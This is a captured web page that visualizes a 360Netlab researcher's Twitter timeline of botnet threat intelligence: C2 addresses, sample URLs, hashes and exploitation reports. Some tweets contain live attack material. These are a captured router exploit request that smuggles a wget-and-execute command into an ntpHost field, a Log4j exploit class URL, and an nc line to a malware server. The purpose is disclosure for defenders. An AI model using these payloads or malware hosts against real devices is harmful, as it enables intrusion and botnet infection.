thevisualized.com (161.35.51.239), urlscan Public Scan
URL: https://thevisualized.com/twitter/timeline/zom3y3;focused=1064840407308099584
Submission: On July 02 via manual from CA — Scanned from CA
Form analysis: 0 forms found in the DOM
Text Content
THE VISUALIZED TWITTER PROFILE, ZOM3Y3 (@ZOM3Y3)

zom3y3 (@zom3y3), China, Apr 24, 2013. blog.netlab.360.com/author/yegensh…
Network Security Researcher @360Netlab #Botnet #Pentest #Honeypot #Sandbox. Opinions and tweets are my own.
225 Tweets, 1.2K Followers, 331 Following.

Since Apr 10, 2019: 100 tweets visualized (including 41 replies and 10 retweets of others), 944 likes (avg. 9.4 per tweet), 380 retweets (avg. 3.8 per tweet).

Most liked tweet since Apr 10, 2019: "#Muhstik #Botnet is spreading through #log4j2 RCE now. Exp: http://45.130.229.168:9999/Exploit.class https://t.co/NLrnB1K3im" (Likes: 316, Retweets: 150).

[Line chart: Retweets and Likes per tweet, Apr 10, 2019 to Dec 11, 2021]

Hashtags used by zom3y3: #Muhstik #Botnet #log4j2 #Prometei #CVE_2021_26855 #XMRig #Fbot #WebLogic #IoT #Mozi #phishing #AMT #0day #Chalubo #Dacls #RAT #Lazarus #Gafgyt #unknown_exploit #Roboto #unknown_botnet #botnet_scan #AVAR2019 #Ngioweb #Tsunami

MENTIONED (AND REPLIED TO) PROFILES BY ZOM3Y3
* QNAP Systems, Inc. @QNAP_nas
* Hack The World @HacktheWorld13
* 360 Netlab @360Netlab
* Alex @alex_bondage
* SANS.edu Internet Storm Center @sans_isc
* Bad Packets @bad_packets
* Shadowserver @Shadowserver
* if(is) @_ifis
* Chris Dietrich @wavehackr
* Alex Edwards @Alex020811881
* Eliran Liberty إليران الحرية @dontMugyou
* Y Combinator @ycombinator
* Vera Xinyue Shen @xyshen365
* Gitworm @Gi7w0rm
* ManchurianClassmate @wonderqs
* SMII Mondher @smii_mondher
* Michael Genkin @Drag0nR3b0rn
* Intezer @IntezerLabs
* Nacho Sanmillan 𓅓 @ulexec
* n0mad @n0mad42
* Michael Schwarz @misc0110
* ΞnZ0xffff0800 @Meta_Explore
* Masafumi Negishi @MasafumiNegishi
* Markus Dauberschmidt @daubsi
* Dominik @0xTyrox
* Yonathan Klijnsma @ydklijnsma
* daniel:// stenberg:// @bagder
* 𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec
* Mikhail Kasimov @500mk500
* R. @0xrb
* Michal Malík @michalmalik
* RootKiter @RooKiter
* ☩MalwareMustDie @malwaremustd1e
* Cloudflare @Cloudflare
* Pastebin @pastebin
* Xia Tianguo 夏甜果 @xiatianguo
* Eugene Kaspersky @e_kaspersky
* Marco Preuß @marco_preuss
* Dan @_xdanx
* Ankit Anubhav @ankit_anubhav

SIMILAR PROFILES LIKE ZOM3Y3: No similar profile(s), try searching!

[Activity heat map, tweets by weekday and hour] zom3y3 is mostly active on Thu around 11PM; since Apr 10, 2019, 12 tweets were posted on Thu around 11PM.

ZOM3Y3'S TWITTER PROFILE SUMMARY
Focused tweet (https://twitter.com/zom3y3/status/1064840407308099584), Tue Nov 20 11:18:31 +0000 2018, 7 Likes and 4 Retweets: "a new family botnet which contains windows and linux version. c2: https://t.co/WXKQwAaRtQ https://t.co/ukkxnj82I2" (51.microsft-update.com)
🗓 Since Apr 10, 2019 posted 100 Tweets and got 944 #Likes and 380 #Retweets 📊

TWEETS (time, date, text, likes, retweets)
* 3:23 AM, Dec 11, 2021 (Most Popular Tweet since Apr 10, 2019): #Muhstik #Botnet is spreading through #log4j2 RCE now. Exp: http://45.130.229.168:9999/Exploit.class https://t.co/NLrnB1K3im (316 likes, 150 retweets)
* 1:36 AM, Aug 31, 2021 (Retweeted via @360Netlab): RT @360Netlab: Our latest (and possibly the last) update on the mozi botnet, https://t.co/YNDN6eIO8J blog.netlab.360.com/the-mostly-dea… (0 likes, 12 retweets)
* 1:37 AM, May 18, 2021: @QNAP_nas @qnap_psirt yes, we have captured and analyzed the zero-day attack. https://t.co/Pvr3vzU8NE https://t.co/tEAGWc3KoG twitter.com/SecurityWeek/s… (0 likes, 0 retweets)
* 1:30 AM, May 07, 2021 (Retweeted via @360Netlab): RT @360Netlab: Our follow up blog on the mysterious RotaJakiro backdoor we published on Apr 28, RotaJakiro appears to be the Linux version… (0 likes, 14 retweets)
* 1:43 AM, Apr 29, 2021 (Retweeted via @360Netlab): RT @360Netlab: Our latest blog, a mysterious trojan that has been active for more than 3 years with 0 Vt detection, we don't exactly know t… (0 likes, 32 retweets)
* 8:14 AM, Apr 27, 2021: The attacker (182.160.112.151) spent a lot of time to attack the Microsoft Exchange servers. https://t.co/L4ai9IMcia (0 likes, 0 retweets)
* 8:18 AM, Apr 19, 2021: #Prometei #botnet is attacking Microsoft Exchange server now. URL: http://178.21.164.68/dwn.php?b64=1&d=nethost64C.exe Scanner IP: 209.37.253.178 https://t.co/COFoNFO68f (35 likes, 20 retweets)
* 3:42 AM, Apr 09, 2021: VT Detection https://t.co/Oc7Kx1bQhA https://t.co/9SEcC4ftPx https://t.co/iNCm8ut0kN virustotal.com/gui/url/7181f4… (0 likes, 0 retweets)
* 2:32 AM, Apr 09, 2021: Two follow-ups about Exchange vulnerability attacks: 1. The target email addresses include: administrator@btrc.gov.bd, leecher88@hotmail.com 2. An attacker frequently attacks through the original webshell, planting another webshell (http://182.160.112.151/test/2.aspx). https://t.co/BP1sQoCoxC (3 likes, 3 retweets)
* 2:13 PM, Mar 30, 2021: @Hacktheworld13 @360Netlab All the urls mentioned at the end of our blog are still alive, and you can download these samples :) (1 like, 0 retweets)
* 6:04 AM, Mar 26, 2021: #CVE_2021_26855 #XMRig mining attack https://t.co/36zSKrt56q https://t.co/ZFrGqc5eTT blog.netlab.360.com/microsoft-exch… (4 likes, 2 retweets)
* 10:57 AM, Mar 15, 2021: I have caught the PoC, such as implanting webshell, obtaining email information, etc., and then waiting to see the spread of malicious samples https://t.co/NyyJLpwsfU (4 likes, 1 retweet)
* 9:44 AM, Mar 15, 2021 (Retweeted via @360Netlab): RT @360Netlab: Our latest blog, a new botnet, ZHtrap, turns infected devices into honeypot to help it find more victims, as well as using p… (0 likes, 11 retweets)
* 7:15 AM, Mar 10, 2021: @alex_bondage ClickHouse + Redash (0 likes, 0 retweets)
* 6:04 AM, Mar 10, 2021: Anglerfish honeypot - Microsoft Exchange vulnerability (CVE-2021-26855) scan in the wild https://t.co/u4cL52WIZn (3 likes, 1 retweet)
* 3:44 AM, Mar 06, 2021 (Retweeted via @360Netlab): RT @360Netlab: Our latest blog, QNAP NAS users, check your firmware now, we started to see attack targeting QNAP NAS 4 days ago, and the at… (0 likes, 4 retweets)
* 1:56 AM, Mar 04, 2021: We have seen #Fbot #botnet using multiple 0 days before (some of them we have not disclosed yet) and it has been targeting various IoT devices, now, it is aiming a new category, traffic and transportation smart devices. https://t.co/l90JIbx3Mt twitter.com/360Netlab/stat… (4 likes, 0 retweets)
* 10:42 AM, Oct 30, 2020: @sans_isc https://t.co/ruk2mnYUIx twitter.com/zom3y3/status/… (2 likes, 2 retweets)
* 10:31 AM, Oct 30, 2020: #WebLogic Console Portal vulnerability (CVE-2020-14882) in the wild https://t.co/CwyboQgo96 (3 likes, 0 retweets)
* 1:57 AM, Oct 15, 2020: @bad_packets Our team (360Netlab) tries to do something, and we have a channel with CNCERT on handling Mozi Botnet in China, and it's a hard and complicated work. (0 likes, 0 retweets)
* 0:19 PM, Oct 14, 2020: @Shadowserver @_ifis @wavehackr https://t.co/SlJw2luHZ0 twitter.com/zom3y3/status/… (1 like, 0 retweets)
* 10:00 AM, Oct 14, 2020: There is a new activity from a large-scale #IoT #Botnet (#Mozi), it attacks a lot of IoT devices from China and India. It has no major version updates from the end of 2019 to August 2020. Winter is Coming ... https://t.co/SNqju2FJNv (14 likes, 11 retweets)
* 2:12 AM, Oct 13, 2020: @Alex020811881 @dontMugyou It is a part of payloads which fbot uses linux command "echo" to write a binary file (fbot downloader), and the other linux commands also include: wget, tftp. As you can see in the IDA screenshot, if the "echo" command works well, it will execute the binary file. https://t.co/snquaUjREG (0 likes, 0 retweets)
* 7:42 AM, Oct 10, 2020: The affected telnet banner information in the Fbot sample. url: http://185.172.110.240/bot.arm4 md5: eecfce993a49eb5bfaed189d5d7dae2e https://t.co/CX44TSAp83 (12 likes, 3 retweets)
* 7:18 AM, Oct 10, 2020: The latest activities of 2 large-scale botnets: 1. #Mozi #Botnet ip address switches from India to China 2. #Fbot #Botnet cracks telnet service through 467 sets of hard-coded username and password, which are related to the banners, and causes a network scan spike from Vietnam. https://t.co/EoeqGGw5Ic (63 likes, 24 retweets)
* 3:03 PM, Oct 01, 2020 (Retweeted via @360Netlab): RT @360Netlab: Our latest blog, A new IoT botnet spreads through two zero-day vulnerabilities targeting Tenda routers https://t.co/ZpYNjQD… (0 likes, 10 retweets)
* 1:43 AM, Sep 01, 2020 (Retweeted via @360Netlab): RT @360Netlab: Our latest blog, a new attack targeting QNAP NAS devices, there is no public available PoC now, but attacker is quietly usin… (0 likes, 17 retweets)
* 2:33 AM, Jul 23, 2020: @bad_packets @ycombinator Maybe Synology DSM (1 like, 1 retweet)
* 2:02 AM, Jul 23, 2020: @bad_packets 😀 https://t.co/HNYZCEjzb6 https://t.co/VxMfzqXuRk news.ycombinator.com/item?id=239208… (3 likes, 0 retweets)
* 9:03 AM, Jun 19, 2020: the Stats of Anglerfish Honeypot https://t.co/auycpde39v https://t.co/1lojV1bxjm twitter.com/zom3y3/status/… (1 like, 0 retweets)
* 8:59 AM, Jun 19, 2020: There are so many honeypots on the Internet that use my fuzzing feature, but not all of them can capture 0-day vulnerability attacks, nor are they Anglerfish honeypots. 😉 https://t.co/Ota9HrBp1p (5 likes, 1 retweet)
* 3:08 AM, Jun 18, 2020: All reports are based on IoT exploits, excluding some protocols such as Telnet and SSH. https://t.co/W8jp3oF3hi https://t.co/hxCegSoRUy twitter.com/zom3y3/status/… (2 likes, 2 retweets)
* 1:46 AM, Jun 17, 2020: @xyshen365 https://t.co/fuZmZFN99L mp.weixin.qq.com/s/O7IuAZV1Xuog… (0 likes, 0 retweets)
* 6:01 AM, Jun 16, 2020: Anglerfish Honeypot - IoT Threats Dashboard https://t.co/Uz2UsGfcgf (10 likes, 2 retweets)
* 10:11 AM, Jun 05, 2020: @Gi7w0rm ClickHouse + Redash (0 likes, 0 retweets)
* 7:07 AM, Jun 05, 2020: another phishing email subject word cloud https://t.co/KTNTZZyblb (2 likes, 1 retweet)
* 2:55 PM, Jun 04, 2020: @wonderqs no (0 likes, 0 retweets)
* 9:10 AM, Jun 04, 2020: https://t.co/ckdNRBhcFc https://t.co/sxZaFP5EDD twitter.com/zom3y3/status/… (0 likes, 0 retweets)
* 8:04 AM, Jun 04, 2020: In the past 3 years, my SMTP honeypot received 121,674 deduplicated #phishing email subjects, and received an average of 2,000 emails per day. https://t.co/Ab41OLaSOx (0 likes, 0 retweets)
* 11:06 AM, Jun 02, 2020: More and more Linux/IoT malware samples spread through zero-day vulnerabilities or multiple n-day vulnerabilities. https://t.co/yoClwrTHHV (7 likes, 0 retweets)
* 1:51 AM, Jun 02, 2020: @xyshen365 I'll try to get an article out soon to share it (0 likes, 0 retweets)
* 8:43 AM, Jun 01, 2020: @smii_mondher ClickHouse + Redash + Yara (0 likes, 0 retweets)
* 8:26 AM, Jun 01, 2020: IoT N-day exploit statistics report for the past 3 years https://t.co/cM2S0S6P2q (15 likes, 7 retweets)
* 1:58 PM, Apr 15, 2020 (Retweeted via @360Netlab): RT @360Netlab: Our latest blog, Multiple fiber routers are being compromised by botnets using another 0-day. Three groups are trying to use… (0 likes, 6 retweets)
* 3:17 AM, Apr 12, 2020: @Drag0nR3b0rn Done. https://t.co/hLpyiivrMQ (2 likes, 0 retweets)
* 6:24 AM, Apr 11, 2020: It's my analysis notes of 2019 IoT advanced malware threat (AMT) research. Hope to study and communicate with you. You can forward it, and leave some valuable suggestions, thank you. #IoT #AMT https://t.co/uO6LAixI1T https://t.co/SNu0UiJkoU docs.google.com/spreadsheets/d… (28 likes, 9 retweets)
* 4:53 PM, Mar 27, 2020: Packet sniffer is one of the main methods for gathering special information. #0day https://t.co/aEAphLktKf twitter.com/360Netlab/stat… (2 likes, 0 retweets)
* 3:58 PM, Mar 20, 2020 (Retweeted via @360Netlab): RT @360Netlab: Our latest blog, multiple botnets are spreading using LILIN DVR 0-day, guess 0 days are no more just reserved for APTs, and… (0 likes, 20 retweets)
* 4:16 AM, Feb 17, 2020: It shows that some files on these IP addresses are connected with each other, and the 0-day attacker behind it is linked to #Chalubo (ChachaDDoS). IoC: 103[.]27.185.139 103[.]82.143.51 https://t.co/U0IFKyow0f https://t.co/3WdM7oFRvz https://t.co/vowSyJ7g1A https://t.co/2CfcKyWqj9 twitter.com/zom3y3/status/… (9 likes, 1 retweet)
* 2:50 AM, Jan 21, 2020: @IntezerLabs @ulexec more IoC: https://t.co/YuQT8SEllI twitter.com/zom3y3/status/… (4 likes, 0 retweets)
* 1:43 AM, Jan 19, 2020: @n0mad42 😀 (1 like, 0 retweets)
* 0:49 AM, Dec 18, 2019: New #Dacls #RAT Linked to #Lazarus Group https://t.co/nzCjoJSl1j https://t.co/vI6EwbYIEt blog.netlab.360.com/dacls-the-dual… (6 likes, 0 retweets)
* 4:24 AM, Dec 02, 2019: On Nov 19 2019, I found an unknown exploit was targeting for a webpage named "sntp", and loading #Gafgyt #Botnet. Samples: http://cncg[.]me/z #unknown_exploit https://t.co/A0QPBdNGtz (7 likes, 0 retweets)
* 4:17 AM, Dec 02, 2019: On Aug 30 2019, I found an unknown exploit was targeting for a DVR device, and loading #Chalubo #Botnet. Still Zero Detection on VT: http://103[.]27.185.139/icatchplugin1 (10ac26ef8571896efa3ee9495c0b71f5) http://103[.]27.185.139/icatch.1.3.23s #unknown_exploit https://t.co/n4Bj5xzvF4 (14 likes, 2 retweets)
* 3:44 AM, Nov 25, 2019: @IntezerLabs @ulexec Related sample: 2808d554258c9d93c44cf259f5627630 (1 like, 0 retweets)
* 2:12 PM, Nov 20, 2019: #Roboto #Botnet #unknown_botnet https://t.co/aGqiE9xzHW twitter.com/360Netlab/stat… (0 likes, 0 retweets)
* 4:05 AM, Nov 11, 2019: Hunting Advanced IoT Malware https://t.co/hdDjSGyXom drive.google.com/file/d/1XYZu-i… (180 likes, 74 retweets)
* 3:46 AM, Oct 16, 2019: Botnet Scan Report for Payload MD5: c601610b5a86293af8ac90ff0e43da24 Exploits Tag: JAWS_DVR_RCE Samples Info: 2019-10-15 00:13:09 07f20725bc544959bdc3b672071a5a33 http://scan[.]switchnets[.]net/x #botnet_scan https://t.co/KXTaegDx60 (4 likes, 0 retweets)
* 4:02 AM, Oct 12, 2019: The moobot botnet started to infect the Shenzhen TVT camera a few days ago, and identified the device fingerprint before loading itself, but then it removed this step and directly worm-scanned and exploited it. Samples Info: nc 93.174.93.178 31337 #botnet_scan https://t.co/eyK4lgZmvx (33 likes, 23 retweets)
* 7:24 AM, Sep 26, 2019: Botnet Scan Report for Payload MD5: 5bdc18aad62bda533df6b7f538388a6b Exploits Tag: Zyxel_VIEWLOG_RCE Samples Info: 2019-09-25 00:15:17 e274ef516bc1577fb2d6e62ac5a6da15 http://136[.]144[.]200[.]209/trixbins.sh https://t.co/UywdwGFgc5.S #botnet_scan https://t.co/xeMCHqt3AM TrojanDownloader.SH (5 likes, 2 retweets)
* 11:28 AM, Sep 20, 2019: When I am hunting for some interesting ELF samples, I find an IoT sample again which is used for CTF and contains some interesting string. @misc0110 md5: d2769c67b0524eb73fdbbe6eb43ca8f7 Interesting string: https://t.co/hiKUudsiUZ 185.228.137.2 [ IoT Control Server ] https://t.co/gKLfKhf5l2 iot.attacking.systems (7 likes, 2 retweets)
* 1:52 AM, Sep 12, 2019: @Meta_Explore I will publish the English version after #AVAR2019. (1 like, 0 retweets)
* 2:02 AM, Sep 06, 2019: @MasafumiNegishi I have noticed it too and it contains XiongMai DVRIP 0-day RCE exploit which is similar to Fbot's but not the same timestamp in the zip file or exploit style. (1 like, 0 retweets)
* 7:40 AM, Aug 25, 2019: If you want to know how I captured advanced IoT malware, there is a Chinese version here. https://t.co/FQYzJpoizt drive.google.com/open?id=1H_NX2… (17 likes, 8 retweets)
* 0:40 PM, Aug 02, 2019: Some Fiberhome routers are being utilized as SSH tunneling proxy nodes https://t.co/gOOXxELXUr blog.netlab.360.com/some-fiberhome… (7 likes, 3 retweets)
* 7:18 AM, Jul 30, 2019: After decrypting this password, it displays some curse words in Chinese. (狗逼滚) 😅 https://t.co/hF3fovtfIG (0 likes, 0 retweets)
* 4:33 AM, Jul 26, 2019: @tinyseashells In fact, the "Communication attempt" is a part of Linux.Ngioweb bot's original behavior and I write it as a subtitle, but I don't do it. "Communication attempt" is a combination of reverse engineering and behavior analysis. (1 like, 0 retweets)
* 4:07 AM, Jul 26, 2019: @tinyseashells Linux.Ngioweb is a type of Proxy Botnet, I have been hunting for unknown botnet (#unknown_botnet) for a long time. I can learn a lot of malware attack and defense skills from it and it's very interesting. 😃 (2 likes, 1 retweet)
* 3:43 AM, Jul 26, 2019: @tinyseashells "Communication attempt" means try to connect to Stage-1 C2. When it establishes communication with Stage-1 C2, and proceed to the next step according to the instructions returned by C2. https://t.co/VQniSuBplD (0 likes, 0 retweets)
* 3:32 AM, Jul 26, 2019: @tinyseashells It's our in-depth analysis report Linux.Ngioweb Botnet for network security area, and readers need to have some expertise. (1 like, 0 retweets)
* 3:49 PM, Jul 24, 2019: https://t.co/UtvABhNF54 exploit-db.com/docs/33253 (3 likes, 0 retweets)
* 3:43 PM, Jul 24, 2019: SQL Injection in Update 🧐 https://t.co/lUrmQLelAT (4 likes, 1 retweet)
* 2:09 PM, Jul 24, 2019: @daubsi @0xTyrox @ydklijnsma If you want to read more about it, here is a slideshow about anglerfish honeypot. https://t.co/xA7NnUO9XX twitter.com/zom3y3/status/… (3 likes, 0 retweets)
* 3:52 AM, Jul 08, 2019: @360Netlab @bagder curl -H 'accept: application/dns-json' -i "https://t.co/onMtK23ZIN" https://t.co/yfbg0xigsx cloudflare-dns.com/dns-query?name… (3 likes, 1 retweet)
* 10:12 PM, Jul 03, 2019: @netresec mitmproxy (0 likes, 0 retweets)
* 11:32 AM, Jul 01, 2019 (Retweeted via @360Netlab): RT @360Netlab: Our latest blog, Godlua Backdoor, it is something a little bit special, it uses a combination of hardcoded dns name, https:/… (0 likes, 31 retweets)
* 2:47 PM, Jun 21, 2019: @500mk500 @0xrb Yes, they're very similar and we have referred this article in our blog. (2 likes, 0 retweets)
* 10:54 AM, Jun 21, 2019: #unknown_botnet #Ngioweb https://t.co/YlgaF8wmK1 twitter.com/360Netlab/stat… (4 likes, 2 retweets)
* 1:17 PM, May 14, 2019: @michalmalik @MasafumiNegishi It shares some codes with mirai, but I don't think it's a mirai variant. (0 likes, 0 retweets)
* 10:54 AM, May 14, 2019: @MasafumiNegishi @RooKiter has noticed that its encryption algorithm is very similar to fbot which we have reported in our blog. https://t.co/8uDvXF7QZK https://t.co/q4PLXFAokq blog.netlab.360.com/the-new-develo… (1 like, 0 retweets)
* 10:44 AM, May 14, 2019: @MasafumiNegishi Yes, it's a new version, and adds some mirai's code now. (0 likes, 0 retweets)
* 9:17 AM, May 14, 2019: It's a new family of DDoS botnet which supports 2 types of DDoS attacks (UDP, TCP). c2: cnc[.]mariokartayy[.]com:52869 (not active now) md5: c7f77db8cb3b353b9a238cd7e515de20 https://t.co/aRoXYRA9qx (5 likes, 4 retweets)
* 6:08 AM, May 11, 2019: @malwaremustd1e @Cloudflare @pastebin I didn't expect MMD to be this fragile, it cracks me up 🤣🤣🤣 I point out your technical mistakes, you respond with three rounds of excuses, and you keep dragging in the "China threat" theory. Indeed, China is what you should most fear, and not only in the field of network security. (0 likes, 0 retweets)
* 7:38 PM, May 10, 2019: @malwaremustd1e @Cloudflare @pastebin In fact, you have made several wrong consultations about the malware analysis. Funny enough 🤣🤣🤣🤣🤣🤣🤣🤣🤣 (0 likes, 0 retweets)
* 5:13 PM, May 10, 2019: @malwaremustd1e @Cloudflare @pastebin As I tweeted to you about a week ago, you made a wrong conclusion about the lua embed botnet. With the help of my colleague Alex.Turing, I can confirm that it can accept 9 types of commands, as shown below. Here are some lua binary files, you may want to analyze them. https://t.co/WWFj0QtmF1 (0 likes, 0 retweets)
* 4:35 PM, May 10, 2019: @malwaremustd1e @Cloudflare @pastebin OK, I will try to communicate with the domain owner about the malicious url. BTW, there are two botnets that use "kerberods" as filename, one is embed lua, and the other one is coded with golang. Maybe they are from different botnet groups but share some linux shell code. (0 likes, 0 retweets)
* 4:24 PM, May 10, 2019: @xiatianguo I have tested it by post parameter, and it doesn't work. BTW, they have different file sizes and embedded strings. Thank you anyway. (1 like, 0 retweets)
* 3:26 PM, May 10, 2019: @malwaremustd1e @Cloudflare @pastebin You should not block gwjyhs[.]com, because it is a free image hosting website which is used by the attacker. 🤣 (1 like, 0 retweets)
* 3:06 PM, May 10, 2019: https://t.co/SkXSs79GKn (0 likes, 0 retweets)
* 1:25 PM, May 10, 2019: Do you know this 404 php webshell whose file size is about 2.6 KB https://t.co/8vYVNlwg9B (3 likes, 2 retweets)
* 10:19 AM, May 08, 2019: It's a new family of IRC botnet which targets 4 types of operating systems including MacOS, Linux, FreeBSD and Windows. c2: uwsedrftgyhujikol[.]sytes[.]net:8080 (not active now) https://t.co/PypMHpJNIS https://t.co/dJFablGKMB virustotal.com/#/domain/uwsed… (6 likes, 0 retweets)
* 9:29 AM, May 08, 2019: It's a new family of DDoS botnet which supports 3 types of DDoS attacks. c2: 176.32.35.23:12956 (not active now) md5: 10c73149cdf2690e7e82b4aec40eb383 #unknown_botnet https://t.co/HXZbB5ULw7 (4 likes, 0 retweets)
* 10:37 AM, May 05, 2019: @malwaremustd1e The C2 is c[.]heheda[.]tk:65314 and d[.]heheda[.]tk:443 is the download server. (2 likes, 0 retweets)
* 9:39 AM, May 05, 2019: It's a variant of Tsunami Botnet, and it supports 22 types of DDoS attacks, kills 360+ known bots (filename), contains 7 methods of exploits and uses "fast-flux" technology for hiding download server. md5: 8ad6a59dff8fd98529ffab0badec8187 c2: 54.36.212.123:8067 #Tsunami #Botnet https://t.co/te40MwRaG6 (48 likes, 13 retweets)
* 10:28 AM, Apr 10, 2019: @e_kaspersky @marco_preuss @_xdanx quite different to your most attacked services https://t.co/UyvnWKdX5N (1 like, 0 retweets)
* 9:06 AM, Apr 10, 2019: It accepts 2 methods of C2 command, one is download and execute a remote file and the other one is DDoS attack (TCP Flood, UDP Flood and HTTP Flood). https://t.co/XCbXLKnkaP (3 likes, 1 retweet)
* 6:28 AM, Apr 10, 2019: @ankit_anubhav I just caught this exploit payload in my honeypot, and I am not the one who discovered this vuln, so I don't want to request a CVE ID. I have searched it on google and nothing matched, but there are some devices that have been recorded on shodan. (2 likes, 0 retweets)
* 3:57 AM, Apr 10, 2019: a new family of DDoS botnet, probably c2: 167.99.8.99:5010 sample url: http://167[.]99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483 #unknown_botnet https://t.co/UIbw5wbRgl (1 like, 0 retweets)
* 3:12 AM, Apr 10, 2019: POST //webs/sysTimeCfgEx HTTP/1.1 Host: {target} Accept-Encoding: identity Content-Length: 186 systemdate=2019-3-27&systemtime=15:39:32&dwTimeZone=30&updatemode=0&ntpHost=$(wget http://181.174.166.164/welcom -O/tmp/welcome;/bin/sh ./tmp/welcome)&ntpPort=123&timezonecon=0 (2 likes, 0 retweets)
* 2:48 AM, Apr 10, 2019: @0xrb Yes, it's the newest c2. It changes the c2 after I reported it. (1 like, 0 retweets)